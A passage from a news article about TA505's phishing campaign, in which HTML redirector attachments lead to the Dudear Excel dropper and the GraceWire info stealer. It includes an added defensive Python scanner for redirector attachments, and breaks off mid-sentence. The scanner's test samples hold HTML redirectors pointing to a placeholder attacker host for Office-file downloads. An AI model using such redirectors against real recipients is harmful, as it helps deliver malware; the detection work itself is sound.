TA505 phishing campaign uses HTML redirectors to spread info stealer


The cybercriminal group TA505 has reportedly changed up its tactics again, now engaging in phishing campaigns that leverage attachments with HTML redirectors in order to deliver Excel documents containing malware.


Following a short period of inactivity, the group resumed activities last month with a scheme designed to get victims to install the information-stealing Trojan GraceWire, according to experts with the Microsoft Security Intelligence team. The threat actor is known for spreading Dridex, TrickBot and Locky malware, and is widely considered synonymous with the alleged Russian cybercriminal outfit Evil Corp.


Recipients of the phishing emails who opened the HTML redirector would end up downloading “Dudear” – an Excel file that drops the main payload (GraceWire) once the malicious macros were enabled. This is a new tactic for TA505, which previously would simply attach the malware directly or use a malicious URL, Microsoft explained in a series of tweets on Jan. 30. (Microsoft also refers to the entire TA505 operation as Dudear.)
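The chain described above starts with an HTML attachment whose only job is to forward the reader to a download of the Excel file. As an added example (not code from the article, Microsoft or TA505 research), here is a small heuristic scanner a mail gateway or triage script could run over `.html` attachments: it extracts meta-refresh and JavaScript redirect targets, records their hosts for threat-intel lookup, and flags targets that end in an Office document extension. The sample attachments and the `attacker.invalid` hostname are constructed placeholders, and the regexes are assumptions about common redirect idioms rather than signatures of this campaign.

```python
"""Flag e-mail HTML attachments that behave as redirectors.

Added example, not from the article: a heuristic scanner for .html attachments.
It reports every redirect target found via <meta http-equiv="refresh"> or a
JavaScript location assignment, plus whether any target looks like an Office
document download. Sample inputs below are constructed for the demo.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed heuristics for the usual JavaScript redirect idioms.
JS_ASSIGN_RE = re.compile(r"location(?:\.href)?\s*=\s*['\"](?P<url>[^'\"]+)['\"]", re.I)
JS_CALL_RE = re.compile(r"location\.(?:replace|assign)\(\s*['\"](?P<url>[^'\"]+)['\"]", re.I)
META_URL_RE = re.compile(r"url\s*=\s*['\"]?(?P<url>[^'\"\s]+)", re.I)

# Extensions that suggest the redirect lands on an Office document (as in the article's Excel stage).
OFFICE_EXT = (".xls", ".xlsx", ".xlsm", ".doc", ".docx", ".docm")


class RedirectScanner(HTMLParser):
    """Collects (mechanism, url) pairs for every redirect the document declares."""

    def __init__(self):
        super().__init__()
        self.redirects = []
        self._in_script = False
        self._script_text = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content="0; url=https://..." -> keep only the target URL
            m = META_URL_RE.search(a.get("content", ""))
            if m:
                self.redirects.append(("meta-refresh", m.group("url")))
        elif tag == "script":
            self._in_script = True

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data; buffer them.
        if self._in_script:
            self._script_text.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            text = "".join(self._script_text)
            self._script_text = []
            for pat in (JS_ASSIGN_RE, JS_CALL_RE):
                for m in pat.finditer(text):
                    self.redirects.append(("javascript", m.group("url")))


def scan_attachment(html: str) -> dict:
    """Return redirect targets, their hosts, and verdict flags for one attachment."""
    scanner = RedirectScanner()
    scanner.feed(html)
    scanner.close()
    hosts = sorted({urlparse(u).hostname or "" for _, u in scanner.redirects})
    office = any(urlparse(u).path.lower().endswith(OFFICE_EXT) for _, u in scanner.redirects)
    return {
        "redirects": scanner.redirects,
        "hosts": hosts,
        "office_download": office,
        # Any declared redirect in a mailed HTML file is worth a second look;
        # a redirect straight to an Office file matches the pattern in the article.
        "suspicious": bool(scanner.redirects),
    }


# Constructed samples; attacker.invalid is a placeholder, not a real indicator.
SAMPLE_META = """<html><head>
<meta http-equiv="refresh" content="0; url=https://attacker.invalid/invoice.xls">
</head><body>Loading...</body></html>"""

SAMPLE_JS = """<html><body><script>
window.location.href = "https://attacker.invalid/doc/report.xlsm";
</script></body></html>"""

SAMPLE_BENIGN = """<html><body><p>Please find the attached invoice.</p>
<a href="https://example.com/portal">Portal</a></body></html>"""


if __name__ == "__main__":
    for name, sample in (("meta", SAMPLE_META), ("js", SAMPLE_JS), ("benign", SAMPLE_BENIGN)):
        print(name, scan_attachment(sample))
```

The verdict is deliberately coarse: a mailed HTML file that exists only to forward the reader is unusual enough to quarantine or sandbox, and the extracted hosts give the SOC something concrete to pivot on.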


“This is the first time that Dudear is observe ..
